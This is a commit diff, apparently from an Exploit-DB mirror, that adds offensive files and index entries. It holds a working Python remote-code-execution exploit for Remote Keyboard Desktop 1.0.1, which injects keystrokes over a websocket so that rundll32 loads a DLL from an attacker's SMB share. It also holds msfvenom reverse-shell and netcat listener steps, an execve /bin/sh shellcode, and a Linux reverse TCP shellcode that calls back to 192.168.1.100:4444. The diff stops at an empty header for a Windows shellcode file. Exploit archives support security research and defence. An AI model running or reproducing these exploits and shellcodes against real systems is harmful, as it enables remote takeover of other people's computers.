Merge remote-tracking branch 'upstream/main'

certcc-ghbot · certcc-ghbot · commit 4c3b0b06fd1e · 2025-05-22T13:00:21.000Z
diff --git a/exploits/windows/remote/52299.py b/exploits/windows/remote/52299.py
@@ -0,0 +1,132 @@
+# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
+# Date: 05/17/2025
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://remotecontrolio.web.app/
+# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
+# Version: 1.0.1
+# Tested on: Windows 10 Pro Build 19045
+
+# Start Remote Keyboard Desktop on your windows
+# Preparing:
+#
+# 1. Generating payload (dll/exe):
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
+# 2. Start smb server: impacket-smbserver SHARE . -smb2support
+# 3. nc -lnvp 8080
+# 4. python exploit.py
+#####
+
+#!/usr/bin/env python3
+
+import websocket
+import json
+import time
+
+target = "192.168.8.105"
+lhost = "192.168.8.101"
+WS_URL = f"ws://{target}:8080/"
+payload = "shell2.dll" # payload dll/exe filename
+debug = False
+
+HEADER_LIST = [
+    "User-Agent: Dart/3.7 (dart:io)",
+    f"Origin: http://{target}:8080",
+    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
+]
+
+#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
+
+SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
+based
+
+special_mapping = {
+    ' ': ("SPACE", False),
+    '/': ("NUMPAD_DIVIDE", False),
+    '\\': ("\\", False),
+    '.': ("NUMPAD_DECIMAL", False),
+    ',': (",", False),
+}
+
+def send_key_event(ws, key, key_down):
+    event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
+key_down, "capsLock": False}}
+    ws.send(json.dumps(event))
+
+def send_text(ws, text, delay=0.05):
+    shift_pressed = False
+    for ch in text:
+        if ch in special_mapping:
+            key_name, need_shift = special_mapping[ch]
+        elif ch.isalpha():
+            need_shift = ch.isupper()
+            key_name = ch.upper()
+        elif ch.isdigit():
+            key_name = ch
+            need_shift = False
+        else:
+            raise ValueError(f"No key mapping for character: {ch!r}")
+
+        if need_shift and not shift_pressed:
+            send_key_event(ws, "SHIFT", True)
+            shift_pressed = True
+        elif not need_shift and shift_pressed:
+            send_key_event(ws, "SHIFT", False)
+            shift_pressed = False
+
+        send_key_event(ws, key_name, True)
+        send_key_event(ws, key_name, False)
+        time.sleep(delay)
+
+    if shift_pressed:
+        send_key_event(ws, "SHIFT", False)
+
+def send_key(ws, keys, delay=0.05):
+    for key in keys:
+        send_key_event(ws, key, True)
+    time.sleep(delay)
+    for key in reversed(keys):
+        send_key_event(ws, key, False)
+
+def on_open(ws):
+    print ("Let's start!")
+
+    send_key(ws, ["LEFT_WINDOWS", "R"])
+    time.sleep(0.5)
+
+    send_text(ws, SMB_PATH)
+    send_key(ws, ["RETURN"])
+    print ("Executing...")
+    time.sleep(1.2)
+
+    print("Check your listener!")
+    if debug:
+
+            print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
+")
+
+    ws.close()
+
+def on_message(ws, message):
+    if debug:
+        print("[=] Received:", message)
+
+def on_error(ws, error):
+    if debug:
+        print("[!] Error:", error)
+
+def on_close(ws, code, reason):
+    if debug:
+        print(f"[x] Closed: {code} - {reason}")
+
+if __name__ == "__main__":
+    websocket.enableTrace(debug)
+    ws = websocket.WebSocketApp(
+        WS_URL,
+        header=HEADER_LIST,
+        on_open=on_open,
+        on_message=on_message,
+        on_error=on_error,
+        on_close=on_close
+    )
+
+    ws.run_forever()
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -45357,6 +45357,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip,
 39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip,
 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,,
+52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,,
 46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe,
 1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,,
 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
@@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php
 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php
+52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,,
 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,,
 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php
@@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh)  + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
+52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,,
 51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
@@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
+52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,,
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,
diff --git a/shellcodes/linux_x86-64/52296.asm b/shellcodes/linux_x86-64/52296.asm
@@ -0,0 +1,31 @@
+# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
+# Date: 2025-03-23
+# Exploit Author: Sayan Ray [@barebones90]
+# Tested on: Linux x86-64
+# CVE: N/A
+
+; P0P SH311 execve ("/bin/sh", NULL, NULL)
+
+GLOBAL _start
+
+section .text
+
+_start:
+    xor rax, rax
+    push rax
+
+    mov r10, 0x68732f6e69622f ; hs/nib/
+    push r10
+
+    mov rdi, rsp  ; rdi points to the string "/bin/sh" from the stack
+                  ; ( const char *pathname )
+
+    ; Calling execve
+    mov rax, 0x3b ; 59 [execve syscall]
+    mov rsi, 0    ; NULL ( char *const _Nullable argv[] )
+    mov rdx, 0    ; NULL ( char *const _Nullable envp[] )
+    syscall
+
+; Shellcode:
+; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
+; [Length] : 36
diff --git a/shellcodes/linux_x86/52297.c b/shellcodes/linux_x86/52297.c
@@ -0,0 +1,43 @@
+/*
+# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
+# Date: 2025-04-06
+# Exploit Author: Al Baradi Joy
+# Platform: Linux x86
+# Type: Shellcode
+# Shellcode Length: 95 bytes
+# Tested On: Kali Linux x86
+# Connect-Back IP: 192.168.1.100
+# Connect-Back Port: 4444
+
+Description:
+This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
+
+Usage:
+Start a netcat listener on your attacking machine:
+    nc -lvnp 4444
+
+Compile and run on the target machine:
+    gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+    ./shellcode
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] =
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"      // zero out registers
+"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66"  // socket syscall
+"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64"  // push IP: 192.168.1.100
+"\x66\x68\x11\x5c"                      // push port 4444
+"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
+"\x89\xe1\xb0\x66\xb3\x03\xcd\x80"      // connect
+"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f"      // dup2 loop
+"\xcd\x80\x49\x79\xf9"
+"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
+"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80";     // execve("/bin/sh")
+
+int main() {
+    printf("Shellcode Length: %zu\n", strlen(shellcode));
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}
diff --git a/shellcodes/windows_x86-64/52298.py b/shellcodes/windows_x86-64/52298.py
